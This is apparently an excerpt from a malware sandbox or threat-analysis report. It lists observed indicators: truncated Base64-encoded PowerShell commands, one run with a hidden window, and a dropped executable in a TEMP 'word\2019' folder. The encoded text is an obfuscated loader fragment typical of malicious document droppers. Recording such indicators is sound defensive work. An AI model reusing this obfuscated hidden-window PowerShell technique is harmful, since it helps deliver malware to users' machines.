Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8AcwAzADIAYQBhAD0AKAAoACcASgAnACsAJwBiAHEAaAAnACkAKwAnADEAJwArACcAaABhACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAE0AUABcAHcAbwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\tvq1013_e.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8AcwAzADIAYQBhAD0AKAAoACcASgAnACsAJwBiAHEAaAAnACkAKwAnADEAJwArACcAaABhACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAE0AUABcAHcAbwBSAGQAXAAyADAAMQA5AF...' (with hidden window)